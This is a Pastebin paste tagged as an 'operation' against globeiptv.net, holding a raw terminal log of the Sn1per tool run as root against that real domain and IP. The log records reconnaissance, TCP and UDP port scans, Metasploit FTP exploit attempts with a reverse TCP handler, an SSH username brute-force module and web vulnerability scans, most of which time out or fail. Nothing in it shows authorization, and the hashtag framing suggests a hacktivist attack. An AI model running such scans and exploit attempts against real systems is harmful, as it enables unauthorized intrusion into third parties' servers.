Advertisement
SaintDruG

#OPGlobeiptv

Sep 13th, 2016
257
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.75 KB | None | 0 0
  1. #OPGlobeiptv.net
  2.  
  3. ┌─[root@anonymous]─[~]
  4. └──╼ #cd Sn1per/
  5. ┌─[root@anonymous]─[~/Sn1per]
  6. └──╼ #git pull
  7. remote: Counting objects: 24, done.
  8. remote: Total 24 (delta 16), reused 16 (delta 16), pack-reused 8
  9. Unpacking objects: 100% (24/24), done.
  10. From https://github.com/1N3/Sn1per
  11. 58c25c7..d94d475 master -> origin/master
  12. Updating 58c25c7..d94d475
  13. error: Your local changes to the following files would be overwritten by merge:
  14. sniper
  15. Please commit your changes or stash them before you merge.
  16. Aborting
  17. ┌─[✗]─[root@anonymous]─[~/Sn1per]
  18. └──╼ #./sniper www.globeiptv.net
  19. ./sniper: line 34: cd: /usr/share/sniper/: No such file or directory
  20. ____
  21. _________ / _/___ ___ _____
  22. / ___/ __ \ / // __ \/ _ \/ ___/
  23. (__ ) / / // // /_/ / __/ /
  24. /____/_/ /_/___/ .___/\___/_/
  25. /_/
  26.  
  27. + -- --=[http://crowdshield.com
  28. + -- --=[sn1per v1.9 by 1N3
  29.  
  30. + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  31. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  32. Server: 8.8.8.8
  33. Address: 8.8.8.8#53
  34.  
  35. Non-authoritative answer:
  36. Name: www.globeiptv.net
  37. Address: 109.123.95.208
  38.  
  39. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  40. www.globeiptv.net has address 109.123.95.208
  41. + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  42.  
  43. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  44.  
  45. [+] Target is www.globeiptv.net
  46. [+] Loading modules.
  47. [+] Following modules are loaded:
  48. [x] [1] ping:icmp_ping - ICMP echo discovery module
  49. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  50. [x] [3] ping:udp_ping - UDP-based ping discovery module
  51. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  52. [x] [5] infogather:portscan - TCP and UDP PortScanner
  53. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  54. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  55. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  56. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  57. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  58. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  59. [x] [12] fingerprint:smb - SMB fingerprinting module
  60. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  61. [+] 13 modules registered
  62. [+] Initializing scan engine
  63. [+] Running scan engine
  64. [-] ping:tcp_ping module: no closed/open TCP ports known on 109.123.95.208. Module test failed
  65. [-] ping:udp_ping module: no closed/open UDP ports known on 109.123.95.208. Module test failed
  66. [-] No distance calculation. 109.123.95.208 appears to be dead or no ports known
  67. [+] Host: 109.123.95.208 is up (Guess probability: 50%)
  68. [+] Target: 109.123.95.208 is alive. Round-Trip Time: 0.92505 sec
  69. [+] Selected safe Round-Trip Time value is: 1.85010 sec
  70. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  71. [-] fingerprint:smb need either TCP port 139 or 445 to run
  72. [-] fingerprint:snmp: need UDP port 161 open
  73. [+] Primary guess:
  74. [+] Host 109.123.95.208 Running OS: (Guess probability: 100%)
  75. [+] Other guesses:
  76. [+] Host 109.123.95.208 Running OS: `�B��U (Guess probability: 91%)
  77. [+] Host 109.123.95.208 Running OS: pF��U (Guess probability: 91%)
  78. [+] Host 109.123.95.208 Running OS: (Guess probability: 91%)
  79. [+] Host 109.123.95.208 Running OS: `�B��U (Guess probability: 91%)
  80. [+] Host 109.123.95.208 Running OS: `�B��U (Guess probability: 91%)
  81. [+] Host 109.123.95.208 Running OS: `�B��U (Guess probability: 91%)
  82. [+] Host 109.123.95.208 Running OS: `�B��U (Guess probability: 91%)
  83. [+] Host 109.123.95.208 Running OS: pF��U (Guess probability: 91%)
  84. [+] Host 109.123.95.208 Running OS: pF��U (Guess probability: 91%)
  85. [+] Cleaning up scan engine
  86. [+] Modules deinitialized
  87. [+] Execution completed.
  88. + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  89.  
  90. Whois Server Version 2.0
  91.  
  92. Domain names in the .com and .net domains can now be registered
  93. with many different competing registrars. Go to http://www.internic.net
  94. for detailed information.
  95.  
  96. No match for "WWW.GLOBEIPTV.NET".
  97. >>> Last update of whois database: Tue, 13 Sep 2016 19:41:29 GMT <<<
  98.  
  99. NOTICE: The expiration date displayed in this record is the date the
  100. registrar's sponsorship of the domain name registration in the registry is
  101. currently set to expire. This date does not necessarily reflect the expiration
  102. date of the domain name registrant's agreement with the sponsoring
  103. registrar. Users may consult the sponsoring registrar's Whois database to
  104. view the registrar's reported date of expiration for this registration.
  105.  
  106. TERMS OF USE: You are not authorized to access or query our Whois
  107. database through the use of electronic processes that are high-volume and
  108. automated except as reasonably necessary to register domain names or
  109. modify existing registrations; the Data in VeriSign Global Registry
  110. Services' ("VeriSign") Whois database is provided by VeriSign for
  111. information purposes only, and to assist persons in obtaining information
  112. about or related to a domain name registration record. VeriSign does not
  113. guarantee its accuracy. By submitting a Whois query, you agree to abide
  114. by the following terms of use: You agree that you may use this Data only
  115. for lawful purposes and that under no circumstances will you use this Data
  116. to: (1) allow, enable, or otherwise support the transmission of mass
  117. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  118. or facsimile; or (2) enable high volume, automated, electronic processes
  119. that apply to VeriSign (or its computer systems). The compilation,
  120. repackaging, dissemination or other use of this Data is expressly
  121. prohibited without the prior written consent of VeriSign. You agree not to
  122. use electronic processes that are automated and high-volume to access or
  123. query the Whois database except as reasonably necessary to register
  124. domain names or modify existing registrations. VeriSign reserves the right
  125. to restrict your access to the Whois database in its sole discretion to ensure
  126. operational stability. VeriSign may restrict or terminate your access to the
  127. Whois database for failure to abide by these terms of use. VeriSign
  128. reserves the right to modify these terms at any time.
  129.  
  130. The Registry database contains ONLY .COM, .NET, .EDU domains and
  131. Registrars.
  132. + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  133. + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  134. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  135.  
  136. ; <<>> DiG 9.10.3-P4-Debian <<>> -x www.globeiptv.net
  137. ;; global options: +cmd
  138. ;; Got answer:
  139. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 62257
  140. ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  141.  
  142. ;; OPT PSEUDOSECTION:
  143. ; EDNS: version: 0, flags:; udp: 4096
  144. ;; QUESTION SECTION:
  145. ;net.globeiptv.www.in-addr.arpa. IN PTR
  146.  
  147. ;; AUTHORITY SECTION:
  148. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015074517 1800 900 604800 3600
  149.  
  150. ;; Query time: 1225 msec
  151. ;; SERVER: 8.8.8.8#53(8.8.8.8)
  152. ;; WHEN: Tue Sep 13 22:41:45 EEST 2016
  153. ;; MSG SIZE rcvd: 127
  154.  
  155. Smartmatch is experimental at ./dnsenum.pl line 698.
  156. Smartmatch is experimental at ./dnsenum.pl line 698.
  157. dnsenum.pl VERSION:1.2.4
  158.  
  159. ----- www.globeiptv.net -----
  160.  
  161.  
  162. Host's addresses:
  163. __________________
  164.  
  165. www.globeiptv.net. 86337 IN A 109.123.95.208
  166.  
  167.  
  168. Name Servers:
  169. ______________
  170.  
  171. www.globeiptv.net NS record query failed: NOERROR
  172. + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  173.  
  174. ____ _ _ _ _ _____
  175. / ___| _ _| |__ | (_)___| |_|___ / _ __
  176. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  177. ___) | |_| | |_) | | \__ \ |_ ___) | |
  178. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  179.  
  180. # Coded By Ahmed Aboul-Ela - @aboul3la
  181.  
  182. [-] Enumerating subdomains now for www.globeiptv.net
  183. [-] verbosity is enabled, will show the subdomains results in realtime
  184. [-] Searching now in Baidu..
  185. [-] Searching now in Yahoo..
  186. [-] Searching now in Google..
  187. [-] Searching now in Bing..
  188. [-] Searching now in Ask..
  189. [-] Searching now in Netcraft..
  190. [-] Searching now in DNSdumpster..
  191. [-] Searching now in Virustotal..
  192. [-] Searching now in ThreatCrowd..
  193. [-] Searching now in SSL Certificates..
  194. [-] Searching now in PassiveDNS..
  195. HTTPSConnectionPool(host='dnsdumpster.com', port=443): Read timed out. (read timeout=25)
  196. + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  197. cat: loot/domains/domains-www.globeiptv.net.txt: No such file or directory
  198. + -- ----------------------------=[Checking Email Security]=----------------- -- +
  199.  
  200. + -- ----------------------------=[Pinging host]=---------------------------- -- +
  201. PING www.globeiptv.net (109.123.95.208) 56(84) bytes of data.
  202. 64 bytes from 109.123.95.208 (109.123.95.208): icmp_seq=1 ttl=56 time=1077 ms
  203.  
  204. --- www.globeiptv.net ping statistics ---
  205. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  206. rtt min/avg/max/mdev = 1077.105/1077.105/1077.105/0.000 ms
  207.  
  208. + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  209.  
  210. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-09-13 22:42 EEST
  211. Nmap scan report for www.globeiptv.net (109.123.95.208)
  212. Host is up (1.1s latency).
  213. Not shown: 33 filtered ports, 2 closed ports
  214. PORT STATE SERVICE
  215. 21/tcp open ftp
  216. 22/tcp open ssh
  217. 110/tcp open pop3
  218. 443/tcp open https
  219.  
  220. Nmap done: 1 IP address (1 host up) scanned in 5.25 seconds
  221. + -- ----------------------------=[Running UDP port scan]=------------------- -- +
  222.  
  223. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-09-13 22:42 EEST
  224. Nmap scan report for www.globeiptv.net (109.123.95.208)
  225. Host is up (1.1s latency).
  226. Not shown: 2 filtered ports
  227. PORT STATE SERVICE
  228. 53/udp open|filtered domain
  229. 67/udp open|filtered dhcps
  230. 68/udp open|filtered dhcpc
  231. 88/udp open|filtered kerberos-sec
  232. 137/udp open|filtered netbios-ns
  233. 139/udp open|filtered netbios-ssn
  234. 162/udp open|filtered snmptrap
  235. 389/udp open|filtered ldap
  236. 520/udp open|filtered route
  237. 2049/udp open|filtered nfs
  238.  
  239. Nmap done: 1 IP address (1 host up) scanned in 5.36 seconds
  240.  
  241. + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  242. + -- --=[Port 21 opened... running tests...
  243.  
  244. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-09-13 22:42 EEST
  245. Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
  246. Nmap done: 1 IP address (0 hosts up) scanned in 3.20 seconds
  247.  
  248.  
  249. ______________________________________________________________________________
  250. | |
  251. | 3Kom SuperHack II Logon |
  252. |______________________________________________________________________________|
  253. | |
  254. | |
  255. | |
  256. | User Name: [ security ] |
  257. | |
  258. | Password: [ ] |
  259. | |
  260. | |
  261. | |
  262. | [ OK ] |
  263. |______________________________________________________________________________|
  264. | |
  265. | http://metasploit.com |
  266. |______________________________________________________________________________|
  267.  
  268.  
  269. Taking notes in notepad? Have Metasploit Pro track & report
  270. your progress and findings -- learn more on http://rapid7.com/metasploit
  271.  
  272. =[ metasploit v4.12.23-dev ]
  273. + -- --=[ 1577 exploits - 907 auxiliary - 272 post ]
  274. + -- --=[ 455 payloads - 39 encoders - 8 nops ]
  275. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  276.  
  277. RHOST => www.globeiptv.net
  278. RHOSTS => www.globeiptv.net
  279. [-] www.globeiptv.net:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (www.globeiptv.net:21).
  280. [*] Exploit completed, but no session was created.
  281. [*] Started reverse TCP double handler on 10.42.0.13:4444
  282. [-] www.globeiptv.net:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (www.globeiptv.net:21).
  283. [*] Exploit completed, but no session was created.
  284. + -- --=[Port 22 opened... running tests...
  285. ./sniper: line 575: cd: ssh-audit: No such file or directory
  286. python: can't open file 'ssh-audit.py': [Errno 2] No such file or directory
  287.  
  288. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-09-13 22:43 EEST
  289. Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
  290. Nmap done: 1 IP address (0 hosts up) scanned in 4.43 seconds
  291.  
  292.  
  293. _---------.
  294. .' ####### ;."
  295. .---,. ;@ @@`; .---,..
  296. ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
  297. '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
  298. `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
  299. "--'.@@@ -.@ @ ,'- .'--"
  300. ".@' ; @ @ `. ;'
  301. |@@@@ @@@ @ .
  302. ' @@@ @@ @@ ,
  303. `.@@@@ @@ .
  304. ',@@ @ ; _____________
  305. ( 3 C ) /|___ / Metasploit! \
  306. ;@'. __*__,." \|--- \_____________/
  307. '(.,...."/
  308.  
  309.  
  310. Payload caught by AV? Fly under the radar with Dynamic Payloads in
  311. Metasploit Pro -- learn more on http://rapid7.com/metasploit
  312.  
  313. =[ metasploit v4.12.23-dev ]
  314. + -- --=[ 1577 exploits - 907 auxiliary - 272 post ]
  315. + -- --=[ 455 payloads - 39 encoders - 8 nops ]
  316. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  317.  
  318. USER_FILE => /root/BruteX/wordlists/simple-users.txt
  319. RHOSTS => www.globeiptv.net
  320. RHOST => www.globeiptv.net
  321. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
  322. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
  323. [*] www.globeiptv.net:22 - Scanned 1 of 1 hosts (100% complete)
  324. [*] Auxiliary module execution completed
  325. + -- --=[Port 23 closed... skipping.
  326. + -- --=[Port 25 closed... skipping.
  327. + -- --=[Port 53 closed... skipping.
  328. + -- --=[Port 79 closed... skipping.
  329. + -- --=[Port 80 closed... skipping.
  330. + -- --=[Port 110 opened... running tests...
  331.  
  332. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-09-13 22:44 EEST
  333. Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
  334. Nmap done: 1 IP address (0 hosts up) scanned in 3.20 seconds
  335. + -- --=[Port 111 closed... skipping.
  336. + -- --=[Port 135 closed... skipping.
  337. + -- --=[Port 139 closed... skipping.
  338. + -- --=[Port 161 closed... skipping.
  339. + -- --=[Port 162 closed... skipping.
  340. + -- --=[Port 389 closed... skipping.
  341. + -- --=[Port 443 opened... running tests...
  342. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  343.  
  344. ^ ^
  345. _ __ _ ____ _ __ _ _ ____
  346. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  347. | V V // o // _/ | V V // 0 // 0 // _/
  348. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  349. <
  350. ...'
  351.  
  352. WAFW00F - Web Application Firewall Detection Tool
  353.  
  354. By Sandro Gauci && Wendel G. Henrique
  355.  
  356. Checking https://www.globeiptv.net
  357. ERROR:root:Site https://www.globeiptv.net appears to be down
  358.  
  359. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  360. /opt/vulnerability-analysis/whatweb/lib/target.rb:188: warning: constant Target::TimeoutError is deprecated
  361. https://www.globeiptv.net ERROR: Timed out execution expired
  362.  
  363. + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  364.  
  365.  
  366.  
  367. AVAILABLE PLUGINS
  368. -----------------
  369.  
  370. PluginChromeSha1Deprecation
  371. PluginHSTS
  372. PluginCertInfo
  373. PluginSessionRenegotiation
  374. PluginHeartbleed
  375. PluginCompression
  376. PluginSessionResumption
  377. PluginOpenSSLCipherSuites
  378.  
  379.  
  380.  
  381. CHECKING HOST(S) AVAILABILITY
  382. -----------------------------
  383.  
  384. www.globeiptv.net => WARNING: Could not connect (timeout); discarding corresponding tasks.
  385.  
  386.  
  387.  
  388. SCAN COMPLETED IN 5.09 S
  389. ------------------------
  390. Version: 1.11.7-static
  391. OpenSSL 1.0.2i-dev xx XXX xxxx
  392.  
  393. ERROR: Could not open a connection to host www.globeiptv.net on port 443.
  394. ./sniper: line 805: testssl: command not found
  395.  
  396. ./sniper: line 807: cd: MassBleed: No such file or directory
  397. ./sniper: line 808: ./massbleed: No such file or directory
  398. + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  399. + -- --=[Checking if X-Content options are enabled on www.globeiptv.net...
  400.  
  401. + -- --=[Checking if X-Frame options are enabled on www.globeiptv.net...
  402.  
  403. + -- --=[Checking if X-XSS-Protection header is enabled on www.globeiptv.net...
  404.  
  405. + -- --=[Checking HTTP methods on www.globeiptv.net...
  406.  
  407. + -- --=[Checking if TRACE method is enabled on www.globeiptv.net...
  408.  
  409. + -- --=[Checking for open proxy on www.globeiptv.net...
  410.  
  411. + -- --=[Enumerating software on www.globeiptv.net...
  412.  
  413. + -- --=[Checking if Strict-Transport-Security is enabled on www.globeiptv.net...
  414.  
  415. + -- --=[Checking for Flash cross-domain policy on www.globeiptv.net...
  416.  
  417. + -- --=[Checking for Silverlight cross-domain policy on www.globeiptv.net...
  418.  
  419. + -- --=[Checking for HTML5 cross-origin resource sharing on www.globeiptv.net...
  420.  
  421. + -- --=[Retrieving robots.txt on www.globeiptv.net...
  422.  
  423. + -- --=[Retrieving sitemap.xml on www.globeiptv.net...
  424.  
  425. + -- --=[Checking cookie attributes on www.globeiptv.net...
  426.  
  427. + -- --=[Checking for ASP.NET Detailed Errors on www.globeiptv.net...
  428.  
  429.  
  430. + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  431. - Nikto v2.1.6
  432. ---------------------------------------------------------------------------
  433. + No web server found on www.globeiptv.net:443
  434. ---------------------------------------------------------------------------
  435. + 0 host(s) tested
  436. + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  437. [+] Screenshot saved to //loot/www.globeiptv.net-port443.jpg
  438. + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +
  439. + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +
  440. Could not open input file: bin/inurlbr.php
  441. + -- --=[Port 445 closed... skipping.
  442. + -- --=[Port 512 closed... skipping.
  443. + -- --=[Port 513 closed... skipping.
  444. + -- --=[Port 514 closed... skipping.
  445. + -- --=[Port 1433 closed... skipping.
  446. + -- --=[Port 2049 closed... skipping.
  447. + -- --=[Port 2121 closed... skipping.
  448. + -- --=[Port 3306 closed... skipping.
  449. + -- --=[Port 3310 closed... skipping.
  450. + -- --=[Port 3128 closed... skipping.
  451. + -- --=[Port 3389 closed... skipping.
  452. + -- --=[Port 3632 closed... skipping.
  453. + -- --=[Port 5432 closed... skipping.
  454. + -- --=[Port 5800 closed... skipping.
  455. + -- --=[Port 5900 closed... skipping.
  456. + -- --=[Port 6000 closed... skipping.
  457. + -- --=[Port 6667 closed... skipping.
  458. + -- --=[Port 8000 closed... skipping.
  459. + -- --=[Port 8100 closed... skipping.
  460. + -- --=[Port 8080 closed... skipping.
  461. + -- --=[Port 8180 closed... skipping.
  462. + -- --=[Port 8443 closed... skipping.
  463. + -- --=[Port 8888 closed... skipping.
  464. + -- --=[Port 10000 closed... skipping.
  465. + -- --=[Port 49152 closed... skipping.
  466. + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
  467. ./sniper: line 1193: cd: yasuo: No such file or directory
  468. ruby: No such file or directory -- yasuo.rb (LoadError)
  469. + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +
  470. ./sniper: line 1209: cd: //loot/: No such file or directory
  471. + -- --=[Sorting loot directory (/)
  472. + -- --=[Generating reports...
  473. + -- ----------------------------=[Done]=------------------------------------ -- +
  474. ┌─[root@anonymous]─[~/Sn1per]
  475. └──╼ #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement